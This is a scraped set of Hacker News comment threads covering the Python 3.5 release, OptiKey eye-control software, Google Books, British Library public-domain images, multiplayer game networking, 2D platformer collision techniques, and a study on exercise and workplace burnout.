By far the most exciting news here, to me, is PEP 484 typing module. Typing support would eliminate one of pythons biggest weaknesses. Furthermore, having it optional means it can remain as easy play and prototype with while becoming "more professional."

The other features are all well rounded, with co-routines having quite some potential, though I'd have to play around with them first to assess.

Now if everything would please start moving on to Python 3 pretty please ;).

pdknsk 10 hours ago 8 replies      
PEP 0448 in addition to already implemented PEP 3132 make it very tempting to switch. If PEP 0448 had unpacking in comprehensions I'd switch. (Doesn't seem be a follow-up PEP just for that functionality yet.)


I'd be really nice to use this.

 >>> [*range(i) for i in range(5)]
Instead of this monstrosity right now.

 >>> [x for y in (range(i) for i in range(5)) for x in y]
Python 2.7 has some minor features that 3 dropped unfortunately, which still makes me hesitate.

Such as filter keeping the type. In 3 it returns an iterator.

 >>> filter(lambda x: x in 'ABC', 'ABCDEFA') 'ABCA'
Or this mostly cosmetic feature.

 >>> filter(lambda x: x[0] > x[1], ((1, 2), (4, 3))) >>> filter(lambda (x, y): x > y, ((1, 2), (4, 3))) # equivalent, error in 3
Also dropped. (It's slower than using the dedicated base64 module though.)

 >>>'Python'.encode('base64') 'UHl0aG9u\n'
Also, I like print.

1st1 10 hours ago 0 replies      
jcadam 7 hours ago 3 replies      
I'd love to use Python 3. Alas, I work in the defense industry and am working on a new development project in Python 2.6. Why? Because that's the version that's already installed on the client's systems, and getting anything new installed is such a nightmare of Vogon-esque policies and procedures that I've learned not to even ask.

I'm constantly having to hack around bugs in ancient versions of libraries that have been fixed years ago for the same reason.

I have a feeling the slow adoption rate of python 3 is not due to developers "rejecting" it.

kayman 3 hours ago 1 reply      
My experience:

I've tried Python 3 and enjoy it very much. A few things drove me nuts at first, trying to figure out why syntax that worked in Python2 is not longer working in Python3.But a little bit of googling and I was on my way with Python3.

I have a project that I started a long time ago in Python2 using web.py.I tried to migrate to Python3, but unfortunately, web.py is not supported.I know Flask has python3 support and I could migrate to that but I'm not ready to move my whole code base over yet.

From someone who tried to migrate to Python3 with no compelling reason to, hit a roadblock, I immediately shelved the problem till later as I'm not missing anything critical from Python3 to warrant the effort.

I wonder how many other projects go through this? Especially much larger, more complex code bases.

baxter001 10 hours ago 1 reply      
The scandir update also changes the underlying implementation of os.walk giving loads of production apps a huge speed increase by making use of additional data returned by the os calls.
thomasahle 2 hours ago 0 replies      
I love all the performance improvements to the standard library. That Serhiy Storchaka has made an impressive amount of contributions, a doesn't seem to be working for anyone?
wheaties 10 hours ago 2 replies      
Does this mean that asyncio will be deprecated as there's now 2 ways to accomplish much of the same thing or do they truly have different semantics?
ctolsen 5 hours ago 0 replies      
Awaiting an official release (and my PR being merged), I made a Docker image which is simply an upgrade of the official one: https://hub.docker.com/r/ctolsen/python/

Also, pytest users might want to use their dev version for now until they fix a 3.5 issue.

dkarapetyan 4 hours ago 2 replies      
Python somehow always manages to miss the mark. The new co-routine stuff is a good example. Who can explain to me how I return more than once from the same co-routine? That is what a co-routine is after all no?
wpietri 8 hours ago 5 replies      
I've recently joined a Python project, my first time working with the language. We're currently using Python 2.7. How do experienced Pythonistas decide if/when to upgrade to 3.x? I figured it was a no brainer given that it has been 7 years with a number of big releases, but Flask's warning on this topic put me off:


bbrazil 9 hours ago 0 replies      
PEP 0475 makes me happy, I've had to workaround interrupted syscalls a few times.
sandGorgon 8 hours ago 3 replies      
Question - is there any web/api framework that leverages asyncio ? This implicitly also means first class DB/ORM support.

Flask, sqlalchemy ,etc seem to be using gevent and py 2.7.

incepted 8 hours ago 2 replies      
And yet, Python 2 usage is still strong while Python 3 adoption has actually slowed down, and at this rate, it will probably stop being used completely while Python 2 continues to live on:


jeo1234 8 hours ago 0 replies      
Very pleased to see PEP 465. In many ways I think python is one of the most exciting languages in terms of where it is going and what it is trying to do.
mixmastamyk 7 hours ago 0 replies      
There are some other nice nuggets in there.

* The new subprocess.run() function provides a streamlined way to run subprocesses.

Yeah! I've implemented that function a dozen times in projects, I suppose because it was too trivial to put on pypi.

* collections.OrderedDict is now implemented in C, which makes it 4 to 100 times faster.

Nice, I use this one relatively often.

cmacke 9 hours ago 0 replies      
It's about time I switched to Python 3.
kozukumi 6 hours ago 0 replies      
The new Windows installer is nice. It has needed updating for a long time so glad to see it get some love finally.
dancsi 6 hours ago 0 replies      
I am impressed that it upgraded cleanly over my previous installation of Python 3.5 release candidate.
gwpolenti 7 hours ago 3 replies      
Could someone explain how to properly install Python 3.5.0 on Ubuntu so that it replaces the system's default Python 3.4.0 as the new default? Installing is the easy part, but I haven't figured out how to also make sure all the libraries that come with Python are also replaced with the 3.5 versions. Thanks!
OptiKey Full computer control and speech with your eyes optikey.org
430 points by aw3c2  3 days ago   80 comments top 20
kozukumi 3 days ago 2 replies      
From the get started page

 "If you are unsure which computer/laptop/tablet to purchase and are considering spending a lot of money then please email me - I can offer personal advice on how to target the sweet spot between cost and performance (and screen size)."
So not only is he giving away this amazing software but he is also offering free, personal advice on what you need to buy working with your budget!

Truly an inspiring person.

dageshi 3 days ago 4 replies      

A lot of interesting information from the author over there.

META: Interesting to note how much cool stuff is turning up on reddit first before it appears here... I feel like it used to be the other way around.

exhilaration 3 days ago 1 reply      
Could this be covered by existing patents? Tools like these for the disabled are a big business, and patent holders have shut down competition in the past: http://www.disabilityscoop.com/2012/06/14/dispute-ipad-app-p...
mcbuilder 2 days ago 1 reply      
I wonder how well the hardware would work with an input system like Dasher. Dasher was experiment in statistical inference and tries to be an accessibility tool as well. http://www.inference.phy.cam.ac.uk/dasher/. I found it really fun to play around with and could get decent speeds but not great. It's true about eye tracking being prohibitively high. When we order an eye tracker for the lab, it ended up costing us 10K.
mh-cx 3 days ago 1 reply      
I wonder if you can combine this with Vim so that you could use it for lightning fast cursor movement and selections and still use the keyboard for anything else.
malnourish 3 days ago 0 replies      
This is amazing software and I'm glad something like this is open source. Accessibility hardware often costs a fortune (for understandable reasons) and software isn't typically cheap either. This seems to be very high quality and it has the potential to really improve people's lives. I'm glad things like this exist.
gragas 3 days ago 3 replies      
This is amazing software, but will it work with me? My left eye is a glass eye and it has little to no movement.
dwiel 3 days ago 1 reply      
I have been using voicecode.io (with dragon naturally speaking) and IR head tracking so that I don't have to use my hands for anything now with pretty good success. The head tracking mouse has a much smaller learning curve, but programming by voice has been rewarding as well.
morley 3 days ago 2 replies      
This could be a really nice keyboard interface for VR too.
neilmovva 3 days ago 1 reply      
Great work. I wonder if the author had heard of the Eyewriter project [1]? Similar system, fully open source, but I'm not sure how active development is nowadays. It's been up since ~2011, though, so quite old by software standards (uses openFrameworks/openCV). Still, it worked impressively well when I built a derivative system.

The accessibility space needs as much open-source development as possible - most of the commercial tech, if you can find it, is locked down and outdated.

[1]: http://www.instructables.com/id/The-EyeWriter-20/

daturkel 2 days ago 0 replies      
Readers here may appreciate: I spoke with the dev for a piece on OptiKey: http://www.businessinsider.com/an-eye-tracking-interface-hel...
aluhut 3 days ago 1 reply      
Can someone elaborate on the use of eye trackers in dark rooms (rooms lightened by dimmed lights or only the monitor itself)? Does it work?
ximeng 2 days ago 1 reply      
https://www.justgiving.com/Julius-Sweetland also raising money for cancer charity at the same time.
rsmith05 3 days ago 2 replies      
As someone that suffers from RSI, I'd be interested in an Opti-mouse.

Does this exist yet?

curiousjorge 3 days ago 0 replies      
this is so mind blowingly good.
andhess 3 days ago 1 reply      
You should take a look at EyeFluence - they have developed some incredible techniques to type with your eyes using non-dwell methods.
sanqui 3 days ago 1 reply      
I wonder if a version of this for mobile phones could make typing on a phone faster than fumbling with a touch screen.
melling 3 days ago 3 replies      
In the demo, he was quick and he didn't even seem to use much autocompletion. However, I wonder if using a different keyboard layout would be helpful. Dvorak a Colmak, for example, place the more frequently used letters on the home row so you'll spend more time with your eyes there. You can evaluate different layouts with a tool like this:


jparishy 3 days ago 0 replies      
Pretty cool, fellow Julius!
samstave 3 days ago 1 reply      
Here is an idea: Tell me if this is stupid:

Assume you have a bunch of HUDs/AACs/Glasses/Whatever that are using this tracking tech. Assume that they are ONLY looking at the real world, not some online data/webpage etc...

There is a camera that either is fwd looking or also 360 looking.

Use the tech to eye track exactly everything that MANY people are looking at to train an AI as to what items in the real-world are important.

i.e. "the ground exists and we know its there, thus its priority in information is low" however "these signs that are being looked at have a higher context priority, and require understanding"

By doing this on a fair scale... you could train AI to use the information of "whats visually important to human navigation" to train them to navigate. This augments what other ML/AI stuff has already been going on...

I do not know if this is basically how self driving cars were developed -- but now that you have a seed of this tracking tech in open source -- it could blossom.

What Ever Happened to Google Books? newyorker.com
290 points by jeo1234  1 day ago   111 comments top 18
chippy 1 day ago 7 replies      
The reminds me of people's attitudes towards reCAPTCHA - started by researchers at Carnegie Mellon University. "Stop spam, read books."

Everyone was supportive of it when it was used towards the non profit digitization of out of copyright books. So, started externally, Google ran with it and continued and expanded the range of books. It remained good. Apparently loads of books were digitized.

Then, possibly along with the change in this article - or along with the perceptible change within Google where everything had to be business accountable a few years back, reCAPTCHA started being used to digitize address numbers from StreetView to improve Googles online mapping, geocoding offering. Nothing to do with books, nothing to do with improving the world.

Now reCAPTCHA is being used for image recognition and training (identify the images with salads). Nothing to do with books, information or improving the world - everything to do with Googles own offerings.

What's even sadder is that http://captcha.net/ still states that it is being used to "help digitize books" but all the links go to https://www.google.com/recaptcha/intro/index.html which have all but removed any public benefit wording. " "Stop spam, read books." was removed from Googles site in 2014.

jrochkind1 1 day ago 1 reply      
This article leaves out some important things.

Google making the project non-profit would not have saved them from the lawsuit. The Author's Guild, separately, sued a non-profit partner in the Google Books scanning project -- HathiTrust. [1]

That lawsuit was not resolved until 2012 -- when, without a settlement, HathiTrust won on fair use.

The court decided that scanning books for searching was fair use. While the court did not say the same for displaying full text -- what the OP wants -- it is notable that the court's opinion was not primarily based on non-profit status of the organization (as is common in U.S. fair use case law; the non-profit factor has generally dwindled in court decision-making), but on transformativeness.

The OP mentions "Others argued that the settlement could create a monopoly in online, out-of-print books," but gives that opinion rather short shrift. This was a very real concern -- what if Google's use really would be fair use? If the court decided that, the opinion would apply as precedent to everyone. But a settlement really does apply only to Google -- no one else even had access to the terms of the settlement. Anyone else trying to do the same would risk being subject to a decade-long lawsuit of their own.

The OP should ask, why didn't Google go to trial?

"If Google was, in truth, motivated by the highest ideals of service to the public...." they should have gone to trial to establish the right for all. As HathiTrust did.

The Google Books project still exists, they did not take it down because of legal worries, even in the absence of the settlement. But it has indeed been allowed to languish. While I'm sure the multi-year lawsuit contributed to this -- Google starting ambitious projects and then allowing them to languish, without improvement, without fulfilling their original promise, slowly degrading and withering away -- is a pretty common Google practice even without multi-year lawsuits.

[1] https://en.wikipedia.org/wiki/Authors_Guild,_Inc._v._HathiTr...

espes 1 day ago 2 replies      
Shout out to the Internet Archive, a non-profit close to what the author describes. Unfortunately it turns out book scanning is expensive and rights-holders still don't like it.


wyclif 1 day ago 2 replies      
I was an early and enthusiastic fan of Google Books. I often do research that relies heavily on 17th-19th century English academic works, which is right in the Google Books public domain sweet spot.

But something went awryI'm not sure whatand the project was allowed to languish by Google. The interface has been in maintenance mode for ages, with no development going on. This leads to a lot of frustration: for instance, you cannot share all of your saved and tagged books with another user, and sharing a shelf or series of shelves is awkward and clunky. In terms of UX, it appears to be abandonware.

On top of that, there's no way to know what's going on or who to talk to, because users can't actually contact anyone at Google Books.

walterbell 1 day ago 1 reply      
In June 2015, the US Copyright Office issued their report with draft legislation, "Orphan Works and Mass Digitization", after consultation with creators, libraries and tech companies. This guidance can be used by the US Congress to create laws permitting Google Books and other efforts to digitize orphaned works.


oneJob 1 day ago 0 replies      
Attempting to force Google to change course on this would at best result in an empty gesture on Google's part with likely no follow up regarding the bigger project. They may open up what is already scanned, but they're not likely to resume the project under benevolent terms.

Employment used to last as lifetime. One could retire from Sears with decent benefits if they were loyal. Today, many of us are contract employees or Uber style "partners". This is the same phenomenon we see happening here, just on the product side. We've been going down this road for a while now. You often don't buy products that last a lifetime anymore. It's often necessary to buy a whole new one rather than fix the one you already have because the replacement parts aren't made available. So, it's happened to our workforce and our products, now it is also happening to our companies. Always in the name of profit. Fair weather friends.

Sometimes this is good. Sometimes it is bad. Almost always it is a false choice.

The logic of capitalism insists on competition and specialization which are often at odds with cooperation and leisure. Why should Google need to choose between the bottom line and benefiting its community by sharing the work they've already accomplished. In a word, competition.

To me, this is the greatest strength of open-source. It allows for cooperation and facilitates transparency, the very foundations of community. Open-source has done nothing to stymie specialization, one of the main thrusts of "The Wealth of Nations". The other, self interest serving the whole, I think, has been shown by history and OSS to be one possible, but not the sole, idea regarding what motivations might facilitate a productive community.

So, back to Google Books. What happened to Google Books is exactly what one should expect to have happened in a political-economy such as ours. A different outcome would not necessarily have resulted from different decisions by Google, but by different incentives and structures of a different economic framework. Let's not be distracted by the red herring of this anecdote, framing it as a one off, but instead look to this anecdote as a case study in a much larger domain.

njharman 1 day ago 0 replies      
> split fifty-fifty between authors an publishers

Why? If anything it should be split between copyright holders. Whoever they are. Legally, author / publisher, are meaningless.

But really if we can't get it together as a culture to eliminate perpetual copyright we should at least make a rule that if a work is not available (print or online) for 5 years then it is deemed abandoned and no longer under copyright. Available doesn't mean free.

Our cultural heritage is a shared resource. It is not right for it to be locked away.

yannis 1 day ago 1 reply      
>The thrilling thing about Google Books, it seemed to me, was not just the opportunity to read a line here or there; it was the possibility of exploring the full text of millions of out-of-print books and periodicals that had no real commercial value but nonetheless represented a treasure trove for the public.

I had the same excitement as the author when Google Books came out. The service has stagnated over the years. Reading snippets is such a frustrating experience (you cannot even cut and paste the text). Even the books where one can buy an ebook is not available for some countries. Many times it is quicker to search on archive.org to find related books digitized by Microsoft.

We still have a long way to go where knowledge can be distributed at low cost and in abundance ...

giancarlostoro 1 day ago 1 reply      
If they somehow could turn those books accessible by a "Google All Book Access" type of service, that would in turn enhance your searching to include all their scanned books it would be amazing. They would however have to somehow figure out how to even make such a service affordable while still keeping publishers 'happy'.
ching_wow_ka 1 day ago 2 replies      
I can say pretty certainly that all the text they've gathered through the Google Books project is in use in their language models and other AI models for their search engine, speech recognition, etc.

They got what they wanted. I can't see what incentive they have as a business to grant access to the books that justifies paying employees for it.

hanlec 1 day ago 0 replies      
> I have a simpler suggestion, nicknamed the Big Bang license. Congress should allow anyone with a scanned library to pay some pricesay, a hundred and twenty-five million dollarsto gain a license, subject to any opt-outs, allowing them to make those scanned prints available to institutional or individual subscribers.

Wouldn't this be great? Many of these materials are not indexed and chances to discover them are decreasing every day. Second, getting access to these materials is for many almost impossible (out of print, not available in the libraries, etc.)

quink 1 day ago 0 replies      
Somewhat related: http://www.theatlantic.com/technology/archive/2012/03/the-mi...

> Because of the strange distortions of copyright protection, there are twice as many newly published books available on Amazon from 1850 as there are from 1950.

Additionally, The Walt Disney Company is sure to get legislation passed before 2024 to extend copyright once more.

pervycreeper 1 day ago 0 replies      
My biggest pet peeve with Google Books is that too many books which are presumably in the public domain have access to them restricted. Not sure if this is oversight, or on purpose.
tuxt 1 day ago 0 replies      
>But, of course, leaving things to Congress has become a synonym for doing nothing, and, predictably, a full seven years after the court decision was first announced, were still waiting.

Ha, never thought about that 7 years ago. :)

jay_kyburz 1 day ago 0 replies      
The authors Big Bang licence is a bit crazy. Why not just monetise Books in exactly the same way they monetise Video in YouTube?

Surely the copyright law is quite similar.

joesmo 1 day ago 0 replies      
So these books that the fight has been about are out of print and essentially do not exist anymore. They do not make money for anyone. They do not contribute to anyone or anything. For all intents and purposes, they might as well not have existed at all. Google tries to make a library of these nonexistent works so that they can once again benefit humanity and the copyright holders (which is pretty much never the authors when it comes to books) are upset because they're losing out on their $0 of profit. Yeah, copyright law really works well in this country.
analognoise 1 day ago 1 reply      
marincounty 1 day ago 2 replies      
"If Google was, in truth, motivated by the highest ideals of service to the public, then it should have declared the project a non-profit from the beginning, thereby extinguishing any fears that the company wanted to somehow make a profit from other peoples work."

I think Google might win over some critics if they resumed the project; set it up as a non-profit, but not some slick non-profit that really doesn't help anyone other than Google?The bylaws would be lawyer proof, and BOD proof. The out of print(out of copyright) books would be available to anyone for free.

I was very excited about this project, and it did seem to just die?

I used to like and defend Google. As of the last few years, with the tracking, plethora of Ads, and the way they ruined YouTube, at least for me.(Yea, I didn't like the way they took it over. I don't like all the advertisements. Plus, I still have embarrassing videos up there that I literally can't get off. Some kind of password screwup that is beyond the helpful customers at the "Help Boards". See Google employees can't be bothered with trivial stuff like my videos. (I asked, and was told to figure it out.)

So Google, if you are listening, go back to your roots. Some people, including myself, hold no loyality to your company anymore. My sister uses Bing. I used to tell her, you might like Google better. Those days are long gone. I'd tell her about Duckduckgo, but it's just not quite their yet.

The British Library Puts Over 1M Images in the Public Domain openculture.com
214 points by benbreen  3 days ago   11 comments top 4
scholia 3 days ago 1 reply      
Interesting... but the million images were released in December 2013.


acabal 2 days ago 2 replies      
To be clear, the images are already in the public domain; that is, they are not restricted by copyright. The British Library has, however, made accessible these public domain images via a web interface.

Their status as images belonging to the public is not related to their being made accessible by the British Library.

colinramsay 2 days ago 2 replies      
Related: does anyone know the "best practise" around digitising photos and images? What file format is used? What scanning equipment? What's the standard resolution/DPI used?
dvliman 3 days ago 1 reply      
in case if anyone interested in the mechanical curator bot source code: https://github.com/BL-Labs/embellishments
Is it just me or is networking really hard? gafferongames.com
317 points by rinesh  17 hours ago   164 comments top 24
ggambetta 15 hours ago 7 replies      
I've written a series of articles about this topic: http://gabrielgambetta.com/fast_paced_multiplayer.html It's usually well received, perhaps because it builds the ideas from the ground up and does not include the words "What the fuck is wrong with you?".
chetanahuja 7 hours ago 3 replies      
"You cant even imagine a way that reliability could be implemented on top of UDP that beats TCP? What total bullshit"

This. This "TCP already does it best in every situation" is a common trope usually spouted by people who know nothing about what TCP does and why. The easiest way to get over this misconception is to ask yourself, can you think of a protocol that not only works well over all sorts of networks, all the way from two boxes connected by a 10Gig switch (with 10us ping latency) vs two hosts talking to each other via a satellite link (with perhaps, 2 second ping latency) but is the best option across all those situations?

The truth is that TCP is the common denominator that's available in pretty much every device you would want to use. But in almost every individual use case, you could come up with a far better protocol if you took the time and effort to treat the problem seriously.

drxzcl 10 hours ago 2 replies      
I know this attitude all too well. I've replied to a few questions on gamedev.stackexchange with pointers to the usual articles on game state synchronization and lag compensation, and I get lukewarm reactions of "too complicated" type. Meanwhile mr rpc-over-tcp get tens of up votes and accepted answer.

Their loss I suppose.

OliverJones 12 hours ago 10 replies      
I sometimes ask the question "how does the internet work?" in interviews. The vague and wrong answers I hear are astonishing. I'm looking for a basic understanding of the layering of TCP, or RDP, or ICMP (or anything actually) on top of IP. I don't get that level of insight much. The people who do have that insight usually can go deeper -- slow-start, BGP, etc.

I wonder if we have a modern version of C.P. Snow's mid-twentieth-century two cultures lament. https://en.wikipedia.org/wiki/The_Two_Cultures. That's the complaint that educated humanities folks don't know the basics of science.

Are we miseducating our so-called "full-stack" engineers by not offering them a basic understanding of telecom? Or are they not listening?

babuskov 14 hours ago 4 replies      
I'm thinking to add online multiplayer to my game: http://store.steampowered.com/app/363670

...so this was very interesting read. I investigated a little bit, and found that there are more protocols than just pure UDP, and now I can't decide which one to try. I narrowed it down to these three:

* PCC http://modong.github.io/pcc-page/

* NORM http://www.nrl.navy.mil/itd/ncs/products/norm

* ENet over UDP http://enet.bespin.org/

What do you think?

Arnt 14 hours ago 0 replies      
Networking has local time, like the relativity theory. "Those two packets are at the same time at point a, but not point b." "A sends b and C sends d, but since time is local you cannot" etc.

So IMO it makes sense that networking is really hard. I like it though. Networking problems are clear when you think hard about them, unlike so many of today's programming problems, where the key is to know some half-documented aspect of a large framework/library/whatnot.

hebdo 11 hours ago 0 replies      
Well, technically speaking any multiplayer game is a distributed database, except that more inconsistency is tolerated ("lag"). But all of the classic results, such as CAP or FLP, apply here as well. And given how hard even the simple distributed protocols are (eg. Paxos) it should not be a surprise that writing a good networking stack for a multiplayer game is also hard.
jokoon 9 hours ago 0 replies      
TCP is suitable for "flat" static content, which you only retrieve at punctual intervals, and is relatively large. A good example is a file which won't change for the next 5 min, and you know that you want that exact file BUT you are ready to wait until it loads perfectly.

UDP is for real time, continuous data, when you can't wait for your hardware to check for packet consistency.

A good example is paper mail versus a telephone call. The paper mail will land, but you don't care if your phone line cuts for 1 second. You just wait for the other guy to check if he can hear you

UDP is really much better when you want to have performance, especially when it comes to responsiveness and latency, but can afford to discard packets if they're not reliable.

I think it boils down to people not realizing how hard it is to transmit data over long distances, and that the protocol don't consider that data transmission is 100% good, because it never is. You can have a lot of interference in your network, but TCP will always manage to land those packets.

Animats 5 hours ago 1 reply      
It's not that networking is really hard, it's that development of synchronized games that run over unreliable links is really hard.

If you want a simple solution for a simple game, here's one. Use a fixed-format UDP packet to pass current location and orientation of the player and whatever else changes rapidly. This should be stateless; if you lose a packet, the next one has a full state update. This is enough for a simple FPS game.

Anything else goes over one or more TCP connections. If you have to load assets (level maps, textures, etc.) just use HTTP over TCP, which means you get to use standard servers and client software for that stuff.

If your game is too complex for that model, you're probably going to have to do some serious thinking about distributed synchronization.

staunch 15 hours ago 2 replies      
> We have the Tribes Networking Model, The Unreal Networking Model, Valve Latency Compensation article.

Which are all derivatives of the Quake model.

ilurk 7 hours ago 2 replies      
I know the article is language agnostic but I don't think anyone would develop their networking modules (in the context of videogames or finance) in anything but C++ (or Erlang/Elixir?).

So could the local experts give their opinion on C++ networking libraries? I know there are a few [1] but how do they compare?

I've only used Qt networking and POSIX sockets (although for C), but the application didn't have much of latency or throughput requirements.

[1] http://stackoverflow.com/questions/118945/best-c-c-network-l...

ninjakeyboard 10 hours ago 0 replies      
You know what I found that is actually quite amazing: Video encoders for streams of linear/live video feed for broadcast go over UDP to the next device in the chain. An encoder will often output a stream of video over UDP to devices that will then split the video into multiple renditions.
Const-me 8 hours ago 0 replies      
Not every game is critical to network latency.Not every game is tolerant to packets loss.If those 4-8 players in the game are playing 3-dimension virtual reality poker, TCP or even HTTP will work just fine.

I have read the original thread, and the author says somewhere in the comment, it is likely to be similar to that you would see in something like Diablo II. Players exist in a world, attack enemies and interact with NPCs (including trading).

Which makes the article irrelevant to the original question. Games like Diablo 2 are not real-time; they can usually use TCP just fine.

zurn 10 hours ago 1 reply      
The single problem with TCP this rightly points out is head-of-line blocking. But overcoming that still leaves you with the problem of coping with out of order or missing events at app level, with clients and servers seeing events in differing sequences (fex packet sequence of move-duck-fire, now shuffle the move around...). I witnessed one game engine project implement custom networking on UDP and then disable unreliable & out of order messages because of game logic headaches.

And the payoff is quite small, since packet loss is rare in healthy networks and TCP handles the rare loss pretty efficiently based on ack clocking, not timeouts (fast retransmit, basically same as his idea of "redundantly sending un-acked data").

toolslive 11 hours ago 0 replies      
I think the topics should be split: you have 'networking' which is about connecting computers typically using TCP, UDP, RDMA, ...and 'distributed systems' which is about how to use connected computers to achieve something.And yes, both are difficult, but for other reasons:

- networking is hard because the APIs are old, platform specific and probably don't behave very intuitively. So trying to build messaging systems on top of sockets is not simple, (but you will only find out after you've moved beyond the prototype stage).

- distributed systems is hard because the odds of successfully exchanging messages aren't in your favour.

vans 8 hours ago 0 replies      
What's the point of this insulting article full of rage ? nothing to do at this ranking on HN.
nubb 7 hours ago 1 reply      
As a network engineer, this was great. No body never bothers to learn networking.

The article is annoying tho, basically says use UDP idiots. I mean, why do we think VOIP uses UDP? Same concept.

If only more devs would implement multicast...

mahouse 15 hours ago 8 replies      
Reading this one could think you would be a fool to use TCP, yet some games (such as World of Warcraft) use TCP exclusively with no problems... What gives?
hmans 13 hours ago 0 replies      
Someone needs a bit of anger management therapy.
mmaunder 8 hours ago 0 replies      
I guess that's one way to package up a fairly fundamental piece of networking knowledge. Wrap the fucker in expletives to get attention.
zobzu 11 hours ago 0 replies      
netcode is the most difficult part of fast multiplier games.then again one could just read quake3 source - its actually, 16 years later, still one of the best for that.
tormeh 12 hours ago 2 replies      
>You have whole industries (gaming, video streaming, VoIP) that will laugh at you if you send time critical data over TCP and rightly so

Skype uses TCP, no? Laugh, indeed.

vog 14 hours ago 1 reply      
Wow, so many downvotes.

Why is it considered non-constructive to point out a misleading title? The title is the first impression of an article, and most likely the authors are not aware of that ambiguity.

A guide to implementing 2D platformers higherorderfun.com
301 points by ingve  2 days ago   32 comments top 11
deathanatos 2 days ago 1 reply      
> Before anything on the scene is stepped, determine whether the character is standing on a moving platform. This can be done by checking, for example, whether his center-bottom pixel is just one pixel above the surface of the platform. If it is, store a handle to the platform and its current position inside the character.

I implemented a 2D platformer with moving platforms once; we solved this simply by using another rule in the article the one for ladders:

> when youre in a ladder, you ignore most of the standard collision system, and replace it with a new set of rules.

There was a special flag on the entity for "is on a platform" (and which platform, too); thus, you trivially knew if something was on the platform. During normal collision detection, if you found yourself falling through a platform, your fall was truncated, and you were affixed to the platform. (An entity's platform variable became, essentially, Some(a_ref_to_the_platform).) The affixing was two-way, IIRC: the platform knew about you, mainly s.t. when it moved, it could update linked entities. And if it was destroyed which could happen then it could unref itself from whatever was on it; really, one had a weakref to the other, but I was not that good a programmer then, so it was more manually implemented.

It worked quite well. We tried the whole pixel business, but it was troublesome; the game engine itself needed to deal with characters falling >1px per game state step, so it already knew "you are falling into a platform" bit.

yoklov 2 days ago 1 reply      
It's fairly disingenuous to say that implementing polygon-based (the article calls it "vectorial") collision detection on platforms is "very difficult to implement properly" without a physics engine.

The collision detection code for this can be done in probably less than a thousand lines (probably less if everything is OBBs). Adding support for arcs, and even bezier curves becomes much, much easier as well (for both, probably another thousand lines, at most). It is also easier to add support for continuous collision detection this way, should that be something you want (although this would increase the amount of code a fair amount).

FWIW, I used to go the pixel-based route, but after having done it this way I'm not sure I would do it again. It ends up being much cleaner, more robust, and easier to extend. I'd go as far as to say that your collision detection and physics code shouldn't have any knowledge of pixels, only your renderer (and maybe the gameplay code, if you insist) should have an idea about these.

I will say that it requires a stronger math background, however, but in all honesty, probably not that much stronger than is required to make the rest of a game.

panic 2 days ago 0 replies      
Matt Thorson, the developer of Towerfall, also has some notes on implementing robust platformer physics: http://mattmakesgames.tumblr.com/post/127890619821/towerfall....

The overall idea is to use integer pixel coordinates (to avoid floating point error accumulation) and to step all physics by one pixel at a time (to avoid fast-moving objects passing through the environment).

Lerc 2 days ago 0 replies      
I think I have implemented all of those methods for various projects.

An extra method of doing platforms that I have used in the past is a simple functional approach, All scene objects return a value for their floor level at a given X. It comes out as similar to the vector approach, but can be more dynamic. Anything standing on a floor is standing on an object so everything is effectively a moving platform, just with most of them stationary. Makes undulating floors easy

zamalek 2 days ago 3 replies      
Did some really cool stuff with "pixel-perfect bitmask collision" back in the day:

1. You treat 64-bit unsigned longs as 8x8 pixel squares.

2. You do "bit magic" (shifts etc.) to align the mask of your character/entities with the landscape.

3. AND the two masks.

4. Nonzero = collision.

I never really used it for anything (wasn't sure if it was faster than more naive approaches), but it was a neat concept/challenge. I guess it would help if you were on a resource-constrained environment (NES etc.).

i336_ 2 days ago 1 reply      
I've actually been looking to explore this for literally ages... I hope to play with this sort of thing someday at both ends of the spectrum, to get a bit of a practical education on how architectures have developed over the past two dozen years or so, and hopefully to have a bit of fun.

On the one hand, I'm really, really interested to understand how the pieces fit together such that it was possible to have supersmooth sidescrolling on the 4MHz CPU in a Game Boy.

On the other hand, I want to learn how to best optimize for the CPU/GPU targets in current- and next-gen desktop and portable devices (PCs, laptops, phones, tablets, etc). It might sound bizarre to want to get the most out of even a 4k-core GPU just for 2D (with maybe some fancy parallax), but 3x4K is going to be a thing more frequently than not going forward... and a pixel-perfect 144fps sidescroller would look truly amazing on something like that.

I want to understand both sides of the coin in-depth so I can optimize for each but also maintain a sense of balance: the majority of game engines are overwhelmingly future-oriented, and when presented with older hardware something like Unity will invariably choke or at least stutter, and Box2D likely would as well.

I do at least realize the complexity in building a game engine from the ground up - like I said before, this is purely for fun and education - but I have no idea where to actually start, no knowledge of older architectures (and their quirks), I still need to learn assembly language (!!) and machine code (it's on the todo list... has been for months...), etc etc.

Advice will truly be hugely appreciated.

benihana 2 days ago 0 replies      
Great read! I'm a web developer but I play the hell out of video games. I really liked how the author explained what effects you're trying to mitigate in the collision detection algorithms. It instantly put it into a very clear and familiar context for me - I haven't programmed under these conditions, but I've definitely played games and seen silly things like this happen:

>This will prevent characters from popping through the slope from the opposite side.

>If you dont ensure this, the player will move horizontally right off the ramp for a while, until gravity catches up and drags him down, making him bounce on the ramp, instead of smoothly descending it.

leni536 2 days ago 0 replies      
For vector based levels I would put Elasto Mania as an early example. I don't know how much it fits into the "platformer" category though. It obviously provides the benefit of having the surface normals naturally compared to the bitmask model.
melling 2 days ago 1 reply      
If you want to watch a game being built, follow this project: https://handmadehero.org
shadowmint 2 days ago 0 replies      
Sadly the blog was abandoned back in 2012, and never saw any other cool updates.
Reducing workplace burnout: the benefits of exercise nih.gov
255 points by mmariani  3 days ago   174 comments top 22
david_shaw 3 days ago 6 replies      
The most interesting part of the study (to me) was this:

> Cardiovascular exercise was found to increase well-being and decrease psychological distress, perceived stress, and emotional exhaustion. Resistance training was noticeably effective in increasing well-being and personal accomplishment and to reduce perceived stress.


> Different types of exercise may assist employees in different ways.

I've always been told that exercise improves feelings of well-being, reduces stress, etc. I've never heard about the different effects that different types of exercise can have on the psyche -- although it makes sense, for example, that improving at resistance training would lead to a sense of accomplishment. If taken to its logical conclusion, this study implies that we should be working out in different ways based on the psychological ailments we may be experiencing. That's fascinating to me.

myth_buster 3 days ago 8 replies      
Could this be the case of missing the forest for the trees? Perhaps the burnout is happening due to stagnant wages and inflation which forces people to work longer or take up additional unfulfilling jobs. Exercises perhaps may only be helping in workers handle additional stress but doesn't improve their being on the whole.

Productivity vs Hourly Wage [0]

GDP vs Median household income [1]

[0] http://www.decisionsonevidence.com/wp-content/uploads/2011/0...

[1] https://upload.wikimedia.org/wikipedia/en/e/e2/US_GDP_per_ca...

6stringmerc 3 days ago 5 replies      
